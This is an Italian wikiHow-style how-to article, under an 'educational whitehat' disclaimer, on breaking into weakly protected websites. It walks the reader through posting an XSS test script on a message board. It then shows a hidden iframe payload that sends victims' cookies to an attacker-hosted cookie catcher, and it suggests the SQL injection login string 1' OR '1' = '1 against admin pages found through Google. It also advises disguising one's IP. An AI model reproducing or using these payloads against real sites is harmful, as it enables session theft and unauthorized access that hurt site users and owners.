Scarica PDFScarica PDFX
How.com.vn è una "wiki"; questo significa che molti dei nostri articoli sono il risultato della collaborazione di più autori. Per creare questo articolo, 28 persone, alcune in forma anonima, hanno collaborato apportando nel tempo delle modifiche per migliorarlo.
Questo articolo è stato visualizzato 29 074 volte
Fai attenzione: Quest’articolo 'How To' è scritto rigorosamente solo per scopi educativi, per avvicinare le persone alla conoscenza dell'hacking whitehat, cioè delle tecniche per violare un sito in maniera legale, o per vedere come lavorano gli hacker, in modo da proteggere meglio i propri siti. Questo tutorial ti fornirà le istruzioni su come accedere a molti siti web che offrono una bassa protezione.
Passaggi
Trova un sito vulnerabile, dove sia possibile pubblicare contenuti. Una bacheca è un buon esempio. Ricordati che, se il sito è sicuro, questo metodo allora non funzionerà.
Vai a creare un post. Dovrai digitare un codice speciale nel "post" che catturerà i dati di tutti coloro che vi cliccheranno sopra.- Ti consigliamo di verificare se il sistema filtra il codice. Pubblica <script...>alert("test")</...script> (ma togli le virgolette). Se appare una finestra di avviso cliccando sul tuo post, il sito è vulnerabile agli attacchi.
Crea e carica il tuo cookie catcher. L'obiettivo di questo attacco è quello di catturare i cookie di un utente, la qual cosa consente di accedere al suo account presente su siti web con accessi vulnerabili. Avrai bisogno di un cookie di tipo catcher, che cattura i cookie del tuo bersaglio e li reindirizza. Carica il catcher su un sito web a cui puoi accedere e che supporta il linguaggio php. Un esempio di tale codice può essere trovato nella sezione di esempio.
Pubblica con il cookie catcher. Inserisci un codice corretto nel post che catturerà i cookie e li invierà al tuo sito. Sarà meglio aggiungere del testo dopo il codice per ridurre i sospetti ed evitare che il tuo post venga eliminato.- Un codice di esempio potrebbe essere il seguente: <... iframe... frameborder=0 height=0 width=0 src=javascript...:void(document.location="YOURURL/cookiecatcher.php?c="+document.cookie) >< .../iframe > (ma devi togliere tutti i puntini).
Usa i cookie che hai raccolto. Dopo aver fatto questo, potrai utilizzare le informazioni dei cookie, che verranno salvate sul tuo sito, per qualsiasi scopo si renda necessario.Pubblicità
Trova un sito vulnerabile. Devi trovare un sito che sia vulnerabile, a causa di una falla nel login dell’admin facilmente accessibile. Prova a cercare su Google “login.asp admin”.
Accedi come amministratore. Digita admin come nome utente e utilizza una delle tante stringhe diverse di password. Può trattarsi di un certo numero di stringhe differenti, ma un esempio comune è 1' OR '1' = '1.
Sii paziente. Questo procedimento probabilmente richiederà un po' di tentativi ed errori.
Accedi al sito web. Alla fine, dovresti essere in grado di trovare una stringa che consenta l'accesso admin a un sito web, supponendo che sia vulnerabile agli attacchi.Pubblicità
Impara un linguaggio di programmazione o due. Se vuoi davvero imparare ad hackerare i siti web, devi capire come funzionano i computer e le altre tecnologie. Impara a utilizzare linguaggi di programmazione come Python o SQL, in modo da avere il migliore controllo possibile dei computer e da poter identificare le vulnerabilità nei sistemi.
È necessario che tu abbia dimestichezza con le fondamenta dell’HTML . In particolare, sarebbe meglio avere una piena comprensione dell’interazione tra HTML e javascript se vuoi essere in grado di violare determinati siti web. Ti ci vorrà un bel po’ di tempo per imparare, ma in rete puoi trovare molte risorse, anche gratuite, per cui, se vuoi approfittarne, avrai certamente l’opportunità per poterlo fare.
Consulta dei whitehat: sono gli hacker che usano le loro capacità a scopi benefici, scoprendo le vulnerabilità di sicurezza e rendendo Internet un posto migliore per tutti. Se hai voglia di imparare le tecniche di hacking e di usare le tue conoscenze per obiettivi benefici o per proteggere il tuo sito web, potresti consultare alcuni whitehat che sono in attività per riceverne utili consigli.
Fai ricerche sull’hacking. Che tu voglia imparare a fare l’hacker o che tu voglia solo proteggere te stesso, dovrai fare un sacco di ricerca. I siti web possono essere vulnerabili sotto aspetti molto diversi, la cui lista è in continuo cambiamento, per cui devi studiare costantemente.
Mantieniti aggiornato. Visto che l'elenco delle possibili vulnerabilità è in continuo mutamento, dovrai mantenerti sempre aggiornato. Solo perché adesso sei protetto da un certo tipo di hack non significa che sarai sicuro in futuro!Pubblicità
Consigli
- Frequenta dei forum di hacker per ottenere moltissimi consigli utili.
Pubblicità
Avvertenze
- Fare hacking è illegale. Se le forze dell’ordine ti scoprono, è colpa tua.
- Se hai intenzione di provare l’hacking nel mondo reale, camuffa il tuo indirizzo IP utilizzando il software disponibile online.
- Se leggi quest’articolo non diventerai certo un hacker immediatamente. DOVRAI coltivare le tue abilità e fare tanto, tanto esercizio.
Pubblicità
Riferimenti
Hai trovato utile questo articolo?
⚠️ Disclaimer:
Content from Wiki How Italiano language website. Text is available under the Creative Commons Attribution-Share Alike License; additional terms may apply.
Wiki How does not encourage the violation of any laws, and cannot be responsible for any violations of such laws, should you link to this domain, or use, reproduce, or republish the information contained herein.
- - A few of these subjects are frequently censored by educational, governmental, corporate, parental and other filtering schemes.
- - Some articles may contain names, images, artworks or descriptions of events that some cultures restrict access to
- - Please note: Wiki How does not give you opinion about the law, or advice about medical. If you need specific advice (for example, medical, legal, financial or risk management), please seek a professional who is licensed or knowledgeable in that area.
- - Readers should not judge the importance of topics based on their coverage on Wiki How, nor think a topic is important just because it is the subject of a Wiki article.
Pubblicità
